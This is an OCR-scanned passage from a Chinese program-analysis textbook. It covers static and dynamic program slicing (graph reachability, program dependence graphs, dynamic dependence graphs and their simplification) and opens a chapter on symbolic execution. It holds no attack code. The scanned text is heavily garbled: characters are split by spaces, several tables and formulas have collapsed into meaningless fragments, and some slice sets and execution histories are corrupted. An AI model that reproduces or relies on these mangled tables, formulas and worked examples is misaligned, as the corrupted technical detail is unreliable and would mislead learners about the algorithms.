计算 项 目 
12 11 10 8 T 6 5 4 3 2 
Rb z z Zi zi Zi Zi Zi Zi zoi z3i 
Bè 7 
Rec.» I i i i i i 
St 4, 6, 7, 10, 12 
表 4-4 第 三 轮 
语句 编号 
计算 项 目 
12 11 10 8 7 6 5 4 3 2 
Rè z z Zi zi zi zi zi zl Zi zi 
Bt 6 
Res.» i i i i i 
Se 3, 4, 6, 7, 10, 12 








基于 数据 流 方程 的 方法 提取 切片 的 策略 较为 保守 ,基本 上 将 所 有 的 控制 依赖 和 数据 
依赖 相关 的 语句 都 赛 括 进 来 ,因此 其 构造 的 程序 切片 往往 较 大 。 当 目标 程序 规模 较 大 时 ， 
可 能 造成 求解 空间 爆炸 ,计算 得 到 的 切片 规模 也 过 大 .分 析 人 员 还 是 无 法 基于 该 切片 进行 
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有 效 分 析 。 
432 基于 图 可 达 性 算法 的 切片 方法 


由 于 程序 的 控制 依赖 关系 和 数据 依赖 关系 都 能 体现 在 程序 依赖 图 上 ,因此 可 以 将 程 
序 的 切片 问题 转换 为 图 的 遍历 问题 , 即 在 程序 依赖 图 上 ,把 所 有 从 切片 准则 所 在 节点 可 达 
(无 论 是 通过 数据 依赖 边 还 是 控制 依赖 边 ) 的 节点 均 加 入 切片 中 。 

基于 图 可 达 性 进行 切片 的 方法 与 图 遍历 方法 基本 相同 ,如 下 面 的 算法 所 示 。 首 先 需 
要 计算 出 目标 程序 的 控制 依赖 关系 和 数据 依赖 关系 ,构建 程序 依赖 图 。 然 后 从 切片 准则 
所 对 应 的 节点 出 发 沿 着 数据 依赖 边 和 控制 依赖 边 进 行 图 遍历 ,所 有 遍历 可 达 的 节点 都 加 
入 到 切片 中 。 


算法 ”基于 图 可 达 性 的 切片 计算 方法 
输入 : 
CFG (G= ( V, E, Entry, Exit) ) 
节点 n( 开 始 节点 ,切片 准则 对 应 节点 ) 
输出 : Slice 
proc GraphSlice (Node n) 
begin 
if not n.visited: 
n.visited-true; 
for s in n.children: 
GraphSlice (s); 


end 


以 图 4-13 所 示 的 代码 为 例 , 其 程序 依赖 图 如 图 4-15 所 示 , 针 对 切片 准则 过 12， 
{2} 二 ,切片 计算 要 从 节点 printf("%d\n" ,x) 开 始 进 行 图 遍历 ,遍历 结果 如 图 4-16 所 示 ， 








图 4-15 示例 代码 程序 依赖 图 
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其 中 以 灰色 填充 的 节点 是 遍历 得 到 的 节点 ,节点 旁边 圆圈 内 的 数字 表示 按照 深度 优先 遍 
历 的 顺序 。 最 后 得 到 的 针对 前 述 切片 准则 的 后 向 切片 为 13,4,6,7,10,12}。 
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图 4-16 基于 依赖 图 的 静态 切片 示例 


4.4 动态 程序 切片 


动态 切片 是 一 种 仅 关注 在 给 定 某 个 输入 条 件 下 对 程序 中 某 点 的 变量 有 影响 的 语句 ， 
动态 切片 的 发 现 来 源 于 程序 动态 调试 的 需要 ,首先 由 Korel 和 Laski 提出 并 给 出 一 种 计 
算 方法 。 由 于 动态 切片 时 程序 的 具体 输入 已 经 确定 ,因此 与 该 输入 相关 的 中 间 临 时 变量 
也 可 以 确定 ,同时 依赖 这 些 具体 变量 的 基本 块 的 可 达 性 也 随 之 可 能 发 生变 化 ,比如 在 静态 
切片 分 析 时 无 法 确定 的 指针 内 容 、 循 环 进 入 和 退出 条 件 (while 和 for 循环 所 控制 的 基本 
块 可 达 性 ) 和 控制 依赖 条 件 (if 语句 所 控制 的 基本 块 可 达 性 ) 等 。 

动态 切片 与 静态 切片 的 最 大 差异 就 在 于 是 否 考虑 了 程序 输入 , 当 考虑 程序 输入 时 , 程 
序 中 的 某 些 路 径 将 不 可 达 , 从 而 能 够 确定 程序 依赖 图 的 部 分 节点 与 切片 准则 不 相关 ,可 以 
从 原始 程序 依赖 图 中 删除 这 些 节 点 以 缩小 图 的 规模 。 因 此 与 静态 切片 相 比 ,通常 动态 切 
片 给 出 的 结果 更 有 针对 性 ,切片 规模 更 小 而 精确 。 

例如 ,图 4-17 左 侧 所 示 为 代码 片段 5, 右 侧 为 其 对 应 的 程序 依赖 图 ,依据 4. 3. 2 节 中 
基于 图 可 达 性 的 切片 方法 计算 其 切片 ,只 需要 从 切片 准则 对 应 的 节点 开始 遍历 程序 依赖 
图 ,并 提取 所 有 可 到 达 的 节点 对 应 的 程序 语句 。 示 例 代 码 针对 切片 准则 二 10, {y} fi it 
态 切 片 如 图 4-18 所 示 ,包括 节点 1,2,3,5,6,8 和 10。 静 态 切 片 中 节点 3.6 RIS 都 是 给 y 
赋值 的 语句 ,这 3 个 节点 都 数据 依赖 于 节点 1, 分 别 控制 依赖 于 节点 2 和 5( 节 点 2 和 5 [n] 
时 数据 依赖 于 节点 1) 。 因 此 节点 1 中 x 的 取 值 至 关 重 要 。 假 设 给 定 节点 1 中 的 x (OS 
1;, 则 节点 1、2、5、8 节点 可 达 ,而 节点 3,6 不 可 达 , 在 遍历 程序 依赖 图 以 获取 程序 切片 时 可 
以 忽略 这 两 个 节点 ,最 终 遍 历 裁剪 后 的 程序 依赖 图 获得 的 程序 切片 为 {1 ,2,5,8,10)。 








图 4-17 代码 片段 5 及 其 程序 依赖 图 


再 如 ,针对 图 4-8 中 的 代码 ,假设 第 1 行 的 x 值 为 2, 第 2 行 y 值 为 3, 则 第 5 行将 不 会 
执行 ,因此 针对 x 值 为 2,y 值 为 3, 切片 准则 为 二 8, {tmp} 二 的 动态 后 向 切片 将 不 包含 
第 5 行 代码 。 

从 上 述 案 例 可 见 ,动态 切片 与 静态 切片 相 比 更 为 精确 ,假如 在 程序 调试 中 在 x 值 为 1 
的 条 件 下 发 现 节点 10 对 应 语句 中 y 的 值 错误 , 则 动态 切片 给 出 的 更 小 切片 仅仅 包含 了 3 
个 给 y 赋值 的 节点 中 的 一 个 ,如 图 4-18 和 图 4-19 所 示 。 切 片 规模 的 显著 减 小 能 够 帮助 
调试 人 员 更 快速 地 确定 错误 原因 。 





图 4-18 代码 片段 5 针对 二 10,{y} 二 的 静态 切片 


由 前 述 可 知 ,可 以 通过 裁剪 程序 依赖 图 来 获得 动态 切片 ,这 种 方法 称 作 基于 程序 依赖 
图 的 切片 方法 。 由 于 该 方法 获得 的 切片 在 某 种 条 件 下 仍然 不 够 准确 ,因此 Agrawal 和 
Horgan 联合 提出 了 另外 一 种 基于 动态 依赖 图 的 切片 方法 。 下 面 将 分 别针 对 这 两 种 方法 
进行 介绍 。 
441 基于 程序 依赖 图 的 动态 切片 方法 


前 面 提 到 通过 裁剪 程序 依赖 图 进行 动态 切片 的 方法 ,本 节 将 深入 介绍 该 方法 ,给 出 其 
改进 方案 ,并 讨论 其 局 限 性 。 
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图 4-19 代码 片段 5 针对 一 10, {y} 二 的 动态 切片 


动态 切片 除了 要 考虑 切片 准则 以 外 ,还 要 考虑 程序 的 具体 输入 。 当 程序 中 某 个 未 指 
定 具体 值 的 变量 被 赋予 某 个 特定 值 时 ,程序 运行 能 够 得 到 一 条 由 执行 指令 构成 的 动态 执 
行路 径 , 这 条 执行 路 径 称 为 执行 历史 。 例 如 ,针对 图 4-20 中 代码 片段 6, 如 果 给 N 指定 一 
个 具体 值 ( 假 设 为 2) ,程序 动态 运行 形成 的 执行 历史 可 以 表示 为 节点 编号 的 序列 : 二 1,2， 
3,4,51,61,71,81,52 ,62,72,82 ,53 ,9 过。 其 中 ,节点 编号 有 上 标 表示 该 节点 在 执行 历史 中 
不 止 一 次 出 现 , 上 标 是 其 出 现 次 数 的 递增 编号 ,如 5 表示 当前 是 第 3 次 执行 语句 5。 








图 4-20 代码 片段 6 及 其 程序 依赖 图 


前 文 将 程序 P 的 静态 切片 准则 记 为 二 n, V>, WERF P 中 所 有 类 似 NN 的 输入 的 
集合 表示 为 Fe , 则 动态 切片 的 切片 准则 可 以 扩展 表示 为 二 n, V. D. IEEE APER 
动态 切片 均 要 求 输入 五 包括 程序 运行 所 需 的 全 部 输入 ,不 讨论 五 仅 包含 部 分 输入 导致 无 
法 获得 执行 历史 的 情况 。 

基于 给 定 输入 五 可 以 获得 程序 已 的 一 个 执行 历史 ,将 程序 依赖 图 中 不 在 执行 历史 中 
的 节点 删除 ,然后 从 切片 准则 对 应 的 节点 开始 进行 程序 依赖 图 的 节点 遍历 , 即 可 获得 该 程 
序 的 动 她 切片 ,这 个 方法 简单 直观 ,不 进一步 阐述 。 

这 种 切片 方法 产生 的 切片 并 不 精确 。 例 如 ,针对 代码 片段 6( 图 4-20) , 当 程 序 输入 N 
为 1 时 ,执行 历史 为 二 1,2,3,4,5! ,6,7,8,5? ,9 过 ,针对 切片 准则 二 9,{z} (N13 7 f] I 
态 切 片 为 {1,2,3,4,5,6,7,8,9}, 从 执行 历史 可 知 ,y 在 节点 7 重新 赋值 定义 后 并 没有 在 
下 一 次 循环 中 被 节点 6 所 引用 (静态 分 析 中 ,节点 6 数据 依赖 于 节点 7) ,节点 7 和 8 执行 
后 循环 结束 ,因此 切片 中 不 应 当 包含 节点 7。 这 主要 是 因为 程序 依赖 图 是 一 种 静态 表示 ， 


mam pan qp. 


节点 9 数据 依赖 于 节点 6, 节 点 6 数据 依赖 于 节点 7, 因 此 只 要 节点 7 出 现在 执行 历史 中 ， 
按照 图 可 达 性 算法 就 会 包含 在 动态 切片 中 。 

前 述 方法 的 问题 可 以 初步 总 结 为 : 任何 一 个 节点 (语句 ) 可 能 依赖 于 多 个 其 他 节点 ， 
这 些 依 赖 关 系 需要 通过 执行 历史 中 的 多 条 执行 路 径 来 体现 ,因此 执行 历史 中 的 执行 路 径 
虽然 无 法 覆盖 该 节点 与 依赖 节点 之 间 的 全 部 执行 路 径 , 但 只 要 某 个 节点 在 执行 历史 中 , 则 
该 节点 关联 的 所 有 边 对 于 图 遍历 都 是 有 效 边 , 仍 然 能 够 通过 遍历 执行 历史 没有 覆盖 的 路 
径 , 而 把 不 相关 节点 也 加 入 到 切片 中 ,导致 最 终 获得 的 切片 过 大 。 例 如 ,采用 该 方法 ,节点 
6 数据 依赖 于 节点 2、3、7, 但 如 果 执 行 历史 的 代码 执行 路 径 没有 覆盖 上 述 所 有 依赖 关系 
(如 上 一 段 中 执行 路 径 没 有 覆盖 节点 7 到 节点 6 的 数据 依赖 边 ), 则 切片 中 包含 节点 2、3、 
7 并 不 合适 。 

造成 前 述 方法 问题 的 原因 在 于 ,切片 所 依据 的 执行 历史 没有 考虑 和 执行 路 径 相关 联 
的 依赖 关系 ,因此 ,一 个 优化 的 思路 是 在 执行 历史 中 加 入 执行 路 径 对 应 的 依赖 关系 ,并 依 
据 该 执行 历史 删除 程序 依赖 图 中 不 相关 的 节点 和 依赖 边 ,然后 进行 图 遍历 即 可 。 经 过 改 
进 的 基于 程序 依赖 图 的 动态 切片 方法 总 结 如 下 : 

(1) 构造 程序 依赖 图 。 

(2) 依据 切片 准则 的 输入 五 得 到 程序 动态 执行 历史 。 

(3) 在 程序 依赖 图 中 删除 在 执行 历史 中 不 存在 的 节点 。 

OD 对 于 当前 依赖 图 中 剩余 节点 之 间 的 每 条 边 , 如 果 这 条 边 对 应 的 控制 和 数据 依赖 
关系 并 没有 在 执行 历史 中 出 现 , 则 将 这 条 边 删除 。 

(5) 从 切片 准则 对 应 的 节点 开始 进行 图 的 遍历 ,将 所 有 可 达 的 节点 加 入 到 切片 中 。 

该 方法 在 某 种 情况 下 产生 的 切片 仍然 过 大 ,如 图 4-21 中 代码 片段 7, 令 节点 1 输入 N 
值 为 2, 进入 节点 3 的 第 一 次 循环 时 ,节点 4 中 输入 x 值 为 一 1, 则 循环 体内 if-else 控制 结 
构 的 分 支 语句 6 会 执行 ,进入 节点 3 的 第 二 次 循环 时 ,节点 4 中 输入 x 值 为 1, 则 循环 体 
内 if-else 控制 结构 的 分 支 语 句 7 会 执行 。 假 设 该 程序 进入 第 二 次 循环 的 第 9 条 语句 ( 节 
点 ) 时 发 现 变量 z 的 值 有 错误 ,要 通过 程序 切片 来 辅助 调试 。 这 时 程序 的 执行 历史 为 二 1， 
2,3! ,4! ,5,6,8' ,9! , 10! ,3*,4*,5*,7,8* ,92 之 ,切片 准则 为 <9:,{z} 过 ,利用 上 述 方法 得 
到 的 切片 为 {1,2,3,4,5,6,7,8,9,10}。 但 第 二 次 循环 时 ,z 值 的 计算 仅仅 依赖 于 节点 7， 
并 不 依赖 于 节点 6, 这 种 情况 下 该 方法 得 到 的 切片 过 大 。 


一 一 一 一 ~ ~ 
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图 4-21 代码 片段 7 及 其 程序 依赖 图 
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切片 过 大 的 原因 在 于 一 条 语句 可 能 执行 多 次 (在 某 个 循环 中 ) ,而 如 果 每 次 执行 时 该 
语句 分 别 数据 依赖 于 不 同 的 语句 , 则 经 过 多 次 执行 后 ,执行 历史 中 覆盖 了 这 条 语句 所 数据 
依赖 的 多 条 语句 , 则 最 终 获得 的 切片 也 将 包含 这 些 语句 。 而 事实 上 ,在 切片 中 得 到 的 该 语 
句 所 数据 依赖 的 多 条 语句 (如 示例 中 语句 9 数据 依赖 于 语句 6 和 语句 7) 中 ,只 有 最 近 执 
行 该 语句 时 所 数据 依赖 的 语句 (按照 执行 历史 ,最 近 执 行 语句 9 时 ,语句 9 所 数据 依赖 的 
语句 为 语句 7) 对 切片 准则 中 的 变量 有 影响 ,而 其 他 语句 (如 示例 中 的 语句 6) 都 没有 影响 。 
而 程序 依赖 图 本 身 无 法 体现 语句 的 不 同 次 执行 的 区 别 , 无 法 对 不 同 次 执行 的 数据 依赖 做 
区 分 。 因 此 ,4.4.2 节 引 入 动态 依赖 图 以 解决 该 问题 。 


442 基于 动态 依赖 图 的 动态 切片 方法 
程序 依赖 图 是 一 种 静态 表示 ,无 法 体现 同一 个 语句 (节点 ) 的 不 同 次 执行 的 区 别 , 因 此 
现在 引入 一 种 新 的 程序 执行 表示 方法 , 它 不 但 能 够 表示 静态 程序 依赖 关系 ,同时 也 能 表示 
程序 的 动态 执行 过 程 ,这 种 新 的 图 称 为 动态 依赖 图 (Dynamic Dependence Graph, DDG) 。 
DDG 的 构造 方法 比较 简单 , 即 遍历 执行 历史 ,依次 为 其 中 每 个 语句 (节点 ) 的 每 一 次 
出 现 都 创建 一 个 新 的 节点 ,同时 节点 之 间 只 因为 程序 执行 而 导致 有 实质 的 控制 和 依赖 关 
系 时 才 建 立 一 条 依赖 边 。 例 如 ,针对 代码 片段 7, 当 N=3,X 依次 取 一 4、3 和 一 2 时 ,执行 
Bi $29«1,2,3 ,4*,5',6' ,8 ,9' ,10  ,3*,4* ,5* 71,8  ,9*,10* ,3* 680 9710 73 9; 
其 动态 依赖 图 如 图 4-22 所 示 , 其 中 3 行 节点 对 应 于 循环 的 3 次 执行 。 在 前 两 次 循环 中 ， 
节点 8 依赖 的 节点 不 同 ,第 一 次 循环 时 节点 8 中 引用 的 变量 y 是 通过 节点 6 的 赋值 语句 
定义 的 ,而 在 第 二 次 循环 中 是 通过 节点 7 的 赋值 语句 定义 的 。 动 态 依赖 图 中 的 节点 会 有 
重复 编号 出 现 ,对 应 该 节点 所 在 语句 的 多 次 执行 。 
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图 4-22 代码 片段 7 的 动态 依赖 图 


基于 DDG 的 动态 切片 计算 比较 简单 ,只 需要 从 切片 准则 对 应 的 节点 开始 遍历 动态 
依赖 图 ,将 所 有 可 达到 的 节点 都 添加 到 切片 中 。 例 如 ,针对 代码 片段 7, 当 N 值 为 3,X 值 为 
一 4.3 和 一 2 的 条 件 下 ,针对 切片 准则 二 9,{z}, 五 过 的 动态 切片 为 {1,2,3,4,5,6,8,9,10}， 


如 图 4-23 中 灰色 节点 所 示 。 
从 动态 依赖 图 的 构造 方法 可 知 ,DDG 的 规模 (节点 数量 ) 不 像 程序 依赖 图 那样 与 程序 
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图 4-23 代码 片段 7 的 动态 切片 示例 


规模 相关 ,其 节点 数量 与 执行 历史 中 的 语句 数量 相同 ,而 执行 历史 的 长 度 与 程序 运行 时 的 
具体 输入 有 关 。 依 据 动 态 依赖 图 进行 节点 遍历 得 到 的 切片 是 程序 节点 的 一 个 子 集 ,而 由 
于 程序 规模 限制 ,切片 的 规模 不 会 很 大 ,对 于 规模 很 大 的 动态 依赖 图 ,切片 只 是 其 中 很 小 
一 部 分 。 例 如 ,针对 代码 片段 7, 如 果 N=10 000, 那 么 动态 依赖 图 的 节点 数量 将 超过 
70 000 个 ,但 是 最 终 获 得 的 动态 切片 的 节点 数量 不 会 超过 10 个 。 因 此 ,动态 依赖 图 的 化 
简 是 一 个 很 重要 的 问题 。 

执行 历史 的 长 度 没有 限制 (可 能 是 无 限 大 ) ,动态 依赖 图 的 大 小 也 因而 没有 上 界 ,但 是 
每 个 程序 可 能 的 动态 切片 受 限于 程序 规模 ,其 数量 一 定 是 有 限 的 ,因此 执行 历史 中 必然 有 
一 些 节 点 的 动态 切片 相同 ,应 当 能 够 合并 动态 切片 相同 的 节点 ,对 动态 依赖 图 进行 化 简 。 
下 面 介绍 一 种 方法 , 它 可 以 在 不 知道 各 个 节点 动态 切片 的 情况 下 对 动态 依赖 图 进行 化 简 。 

动态 切片 无 法 直接 计算 ,但 是 执行 历史 中 每 个 节点 的 直接 数据 依赖 和 直接 控制 依赖 
的 节点 比较 容易 得 到 , 称 一 个 节点 v 直接 数据 依赖 的 节点 集合 为 D ,其 直接 控制 依赖 的 节 
点 集合 为 C。 如 果 两 个 节点 u 和 w 的 直接 数据 依赖 节点 集合 和 直接 控制 依赖 节点 集合 的 
并 集 相同 ,那么 这 两 个 节点 在 后 续 通 过 图 遍历 计算 得 到 的 切片 是 相同 的 。 即 如 果 有 D, U 
C, — D. UC, Jl SliceGi) — SliceCo) ,因此 可 以 将 这 两 个 节点 和 w 合 

构造 简化 的 依赖 图 同样 是 依次 遍历 执行 历史 中 每 个 节点 。 假 设 当 前 执行 历史 中 的 节 
点 为 w。 如 果 当 前 依赖 图 为 空 , 则 创建 节点 v, 如 果 依 赖 图 不 为 空 , 则 查询 当前 依赖 图 , 查 
看 是 否 有 节点 uS D.UC.=D.UC。。 如 果 存 在 , 则 不 创建 新 节点 ,并 将 节点 v 编号 添 
加 到 节点 w 中 (如 果 w Ao 的 编号 相同 , 则 不 重复 添加 ) ;如 果 不 存在 , 则 创建 一 个 新 节点 ， 
节点 编号 为 v 的 编号 ,同时 从 新 节点 引出 依赖 边 ,指向 D,U Cs 中 的 所 有 节点 。 

在 上 述 构造 过 程 中 ,需要 时 刻 掌 握 当前 图 中 各 个 节点 的 D 和 C, 因 此 需要 动态 维护 
3 个 数据 结构 , 即 DefineNode 表 .ControlNode 表 以 及 ReachableStmts 表 。DefinedNode 
表 将 某 个 变量 与 当前 图 中 最 后 一 次 定义 该 变量 的 节点 编号 关联 起 来 。ControlNode 表 将 
某 个 控制 谓词 条 件 与 其 在 图 中 最 近 一 次 出 现 的 节点 关联 起 来 。ReachableStmts 表 将 图 
中 每 个 存在 节点 与 其 可 到 达 的 所 有 节点 的 集合 关联 起 来 。 例 如 ,针对 代码 片段 7, 如 果 执 
fr Bj 9839—1,2,3! ,4' ,5! E ,9! ,10! ,3* ,4?,5? ,7! ,8* .9* ,10* ,3* 4? ,5*,67,85,9*, 10? , 
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3'2- WW DL 4-5 展示 了 进行 节点 遍历 时 这 3 个 数据 结构 的 变化 过 程 , 其 中 DefineNode 
简写 为 D,ControlNode 简写 为 C. ReachableStmts 简写 为 R. 













































































表 4-5 节点 遍历 
序号 D c R 新 节点 新 建 边 
1 |N—1 11 1 
2 |2 2 一 2 2 
3—1 
1 — — 
3 3—3 3—1,2,3 3 adv 
4 | X, 4,71,2,3,4 4 4-3 
5,—3 
1 5—5 5,—1,2,3,4, ,5 5 
5 1 1 TA 1 nod 
&' | Y—6, 6,—1,2,3,4, ,51 ,61 6, 6, 5, 
8 |Z-8 8 一 1,2,3,4 ,51,61 ,8 8, 83,6, 
9! 9 一 1,2,3,4 5: 561481 49 9; 9,—3.8i 
10 | 110 1071,2,3 10 10—1,2,3 
10 替换 为 
2 >. — 
3 |I-(10,3) | 3—(10,3) “ngh 
4 | X, 4;—1,2,3,4; (10,3) 4; 4,—(10,3) 
5 5-5 5:—1,2,3, (10,3) 4; ,5 5 Srt 
2 2 9 $42 222 2 5,—(10,3) 
75 
7 |Y-—7 7 一 1,2,3,(10,3),4: ,5: ,7 
7 一 4 
g |Zz-8 8—1,2,3, (10,3) 4; ,52 7,8 8 aid 
i a A E A d 8, (10,3) 
9;—8; 
2 9: 一 1,2,3,(10,3) ,4; ,52 ,7,8 9 
s ETARA a 9,-7 (10,3) 
105 | 40,3) 
$ 
e 
m 
6,4 
6 6:—1,2,3. (10,3) 44; ,52 ,62 6; S 
6,5; 
e [Z8 8,—1,2,3, (10,3) 4 ,52 6; ,8 8 uie 
à 571,2,3,(10,3) 4; ,52 ,6: 8s " $ C10: 
9,8; 
s 9,—1,2,3. (10,3) ,4, ,52 ,62 ,8: ,9 9. 
9 5 2 592 ,62 ,83 +93 3 pa 
10 | 100,3) 
" 




















mam meu qe. 


另外 ,上 述 方法 存在 一 个 问题 , 即 针对 循环 依赖 仍然 会 产生 大 量 互相 依赖 的 重复 节 
点 。 例 如 ,针对 代码 片段 7, 节 点 3 与 节点 10 之 间 存 在 循环 依赖 ,按照 上 述 方法 将 不 断 产 


生 节 点 3 和 10 的 重复 节点 ,如 图 4-24 所 示 。 
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图 4-24 节点 3 和 10 的 循环 依赖 


要 解决 该 问题 ,需要 进一步 查看 当前 要 添加 节点 的 可 达 节 点 集合 是 否 是 其 某 个 直接 
后 继 节点 vo 的 可 达 节 点 集合 的 子 集 , 如 果 是 , 则 将 不 添加 该 节点 ,将 其 加 入 节点 vv 中 。 针 
对 第 二 次 循环 时 的 节点 3, 若 添加 该 节点 , 则 其 可 达 节 点 集合 为 11,3,10} ,其 直接 后 继 节 
点 集合 为 {1,10}, 其 中 节点 1 的 可 达 节 点 集合 为 {1), 而 10 的 可 达 节 点 集合 为 
{1,2,3,10} ,如 图 4-25 所 示 。 可 见 节 点 3 的 可 达 节 点 集合 是 节点 10 的 可 达 节 点 集合 的 
子 集 ,因此 不 创建 新 节点 3, 而 将 节点 3 添加 到 节点 10 中 ,如 图 4-26 所 示 。 
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图 4-26 节点 3 和 节点 10 合并 








针对 代码 片段 7 获取 的 动态 依赖 图 如 图 4-27 所 示 。 基 于 动态 依赖 图 进行 切片 计算 
不 需要 进行 图 人 遍历, 只 需要 查找 切片 准则 对 应 的 语句 ,然后 在 该 语句 执行 时 的 
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DefineNode 表 中 查找 切片 准则 中 变量 对 应 的 节点 ,该 节点 在 ReachableStmts 表 中 对 应 的 
条 目 就 是 所 需要 的 切片 。 例 如 ,针对 图 4-21 中 的 代码 片段 ,要 针对 切片 准则 二 9;, (2) 
计算 切片 ,只 需要 在 中 查找 z 的 最 后 一 次 定义 ,如 表 4-5 中 的 序号 为 8. 的 行 所 示 , 是 节点 
8: ,其 在 ReachableStmts 表 中 的 可 达 节 点 集合 是 {1,2,.3,4:,5:,6:,8:,(10,3)} ,切片 
98 (1,2,3,4,5,6,8,10). 
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图 4-27 代码 片段 7 的 简化 动态 依赖 图 


4.5 小 结 


程序 切片 作为 一 种 常用 的 程序 分 析 和 理解 方法 ,经 过 长 期 发 展 , 不 仅 在 软件 调试 、 软 
件 维护 、 软 件 测试 等 领域 取得 了 成 功 应 用 ,而 且 在 软件 着 向 分 析 、 软 件 漏洞 成 因 分 析 等 领 
域 发 挥 了 不 可 替代 的 作用 。 

程序 切片 按照 常见 的 主要 分 类 方式 , 即 切片 过 程 是 否 考虑 程序 的 具体 输入 ,可 以 划分 
为 静态 切片 和 动态 切片 。 本 章 结合 具体 代码 示例 针对 这 两 种 切片 方法 进行 了 详细 介绍 ， 
其 中 静态 切片 主要 有 基于 数据 流 方程 求解 的 切片 方法 和 基于 图 可 达 性 遍历 的 切片 方法 ， 
本 书 推荐 基于 图 可 达 性 遍历 的 方法 ,该 方法 易于 实现 和 理解 , 且 能 够 方便 地 扩展 并 支持 包 
含 过 程 甚至 面向 对 象 语言 所 编写 程序 的 切片 。 关 于 动态 切片 不 考虑 程序 的 全 部 代码 ,而 
是 从 程序 基于 特定 具体 输入 所 执行 的 指令 中 提取 切片 ,因此 针对 性 更 强 ,准确 度 高 于 静态 
切片 。 关 于 动态 切片 主要 介绍 了 基于 程序 依赖 图 和 基于 动态 依赖 图 的 切片 方法 ,其 中 动 
态 依赖 图 基于 程序 执行 历史 进行 切片 , 相 比 于 其 他 方法 能 够 获得 更 高 的 准确 性 。 

第 7 章 也 会 涉及 控制 流 和 数据 流 等 程序 分 析 方法 ,理论 上 该 方法 可 视 作 一 种 动态 前 
向 切片 ,但 由 于 污点 传播 方法 更 多 应 用 于 软件 安全 分 析 , 会 面临 着 不 完全 相同 的 问题 和 挑 
战 ,因此 单独 开辟 一 章 进行 讲解 ,读者 可 以 将 这 两 章 进行 比较 阅读 ,以 加 深 对 于 程序 分 析 
方法 的 理解 。 
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符号 执行 


符号 执行 技术 在 1976 年 由 Jame C. King 提出 中 。20 世纪 70 年 代 , 关 于 软件 正确 性 
测试 的 研究 工作 都 基于 一 个 原则 : 选择 合适 的 测试 用 例 对 程序 运行 状态 进行 测试 ,如 果 
对 于 提供 的 输入 都 能 产生 正常 的 结果 输出 , 则 认为 程序 是 可 靠 的 。 其 中 的 方法 可 分 为 两 
大 类 。 一 类 是 以 模糊 测试 为 代表 的 随机 性 测试 ,虽然 模糊 测试 等 随机 测试 方法 至 今 仍 活 
路 在 软件 安全 测试 的 一 线 , 但 其 具有 的 盲目 性 和 随机 性 使 其 无 法 提供 完整 可 靠 的 测试 结 
果 。 另 一 类 是 以 模型 检测 为 代表 的 形式 化 证 明 方法 ,通过 归纳 法 来 证 明 程 序 是 否 具有 期 
望 的 性 质 ,证 明 过 程 的 复杂 性 使 其 在 面 对 大 规模 程序 的 时 候 几 乎 不 可 用 。 正 是 在 这 样 的 
背景 下 James C. King 提出 了 符号 执行 方法 ,可 以 将 其 看 成 是 上 述 两 类 传统 方法 的 折 中 。 
King 希望 在 无 法 获取 程序 特性 说 明 等 信息 的 情况 下 ,仍旧 能 够 对 其 进行 快速 全 面 的 自动 
化 安全 性 检测 。 本 章 将 对 符号 执行 的 基本 方法 进行 介绍 。 


5.1 符号 执行 基本 模型 
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符号 执行 的 基本 思想 是 : 使 用 符号 变量 代替 具体 值 作为 程序 或 函数 的 参数 ,并 模拟 
执行 程序 中 的 指令 ,各 指令 的 操作 都 基于 符号 变量 进行 ,其 中 操作 数 的 值 由 符号 和 常量 组 
成 的 表达 式 来 表示 。 

对 于 任意 程序 ,其 执行 流程 是 由 指令 序列 的 执行 语义 控制 的 ,执行 语义 包括 : 变量 定 
义 语句 对 数据 对 象 的 描述 ,声明 语句 对 程序 数据 对 象 的 修改 ,条 件 语 句 对 程序 执行 流程 的 
控制 。 当 程序 的 输入 参数 确定 时 ,其 指令 序列 被 固定 下 来 ,因此 程序 执行 语义 和 控制 流 也 
就 得 到 确定 。 如 果 不 用 具体 数值 ,而 是 用 符号 值 作为 程序 的 输入 参数 , 则 指令 序列 的 操作 
对 象 就 从 具体 数值 变 为 了 符号 值 .程序 的 执行 语义 和 控制 流程 也 变 成 了 和 符号 变量 相关 
的 符号 表达 式 。 读 者 可 以 将 符号 执行 视 为 程序 具体 执行 的 自然 扩展 ,符号 变量 使 得 程序 
执行 语义 变 得 不 确定 ,这 也 使 得 符号 执行 技术 在 理想 情况 下 可 以 遍历 程序 执行 树 的 所 有 
路 径 。 也 可 以 将 程序 的 一 次 具体 执行 视 为 符号 执行 的 一 个 实例 , 当 需 要 对 某 条 程序 路 径 
进行 遍历 分 析 时 ,只 需 根 据 符 号 执行 方法 对 该 路 径 的 分 析 结 果 ,就 可 以 引导 控制 流 遍 历 该 
路 径 的 程序 输入 。 

King'" 在 提出 符号 执行 技术 的 同时 ,也 为 其 限定 了 理想 的 使 用 场景 : 

CD 理想 模型 中 程序 只 处 理 有 符号 整数 ,在 实际 测试 中 这 种 情况 不 会 出 现 
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(2) 理想 模型 中 假定 程序 “执行 树 ” 的 规模 是 有 限 的 ,在 实际 测试 中 ,由 于 程序 中 存在 
的 循环 等 原因 ,很 多 程序 的 “符号 执行 树 ” 可 能 是 无 穷 大 的 。 

(3) 理想 模型 中 符号 执行 技术 可 以 处 理 程序 内 所 有 if 条 件 语句 中 的 约束 表达 式 , 在 
实际 测试 中 ,约束 表达 式 中 通常 会 出 现 符号 执行 引擎 无 法 处 理 的 操作 和 变量 类 型 。 
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基于 符号 执行 技术 的 理想 场景 对 程序 语言 做 如 下 定义 。 

CD 程序 变量 类 型 : 程序 中 只 包括 有 符号 整数 类 型 。 

(2) 程序 语句 类 型 , 

。 简单 的 声明 语句 ,例如 ,a=3。 

证 条 件 语句 (包括 then 和 else) ,例如 ifCa-—00 ,假定 程序 内 所 有 if 条 件 语句 中 的 
表达 式 都 可 以 化 简 为 {arith. expr. } 三 0 的 形式 ,例如 一 a 一 1 三 0。 

无 条 件 跳 转 语句 ,例如 goto 语句 。 

变量 操作 语句 ,例如 读 操作 (read)。 变 量 处 理 操 作 符 中 只 包含 基本 的 整数 运算 操 
f ,例如 加 \ 减 . 乘 ( 十 一、* )。 
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虽然 程序 语义 因为 符号 变量 的 加 入 而 发 生变 化 ,但 无 论 是 程序 语法 还 是 程序 语句 的 
操作 流程 都 不 会 因为 符号 变量 的 存在 而 发 生变 化 ,这 就 保证 了 符号 执行 技术 的 有 效 性 。 
下 面 首先 介绍 程序 执行 语义 在 符号 执行 模式 下 产生 的 变化 。 

1. 符号 数据 对 象 

为 了 简化 描述 ,假设 每 次 程序 需要 新 的 输入 时 ,都 从 符号 列表 {al,a2,a3,…} 中 选取 ， 
程序 输入 参数 中 的 符号 变量 通过 变量 声明 数学 运算 操作 等 方式 传递 至 程序 中 的 变量 。 
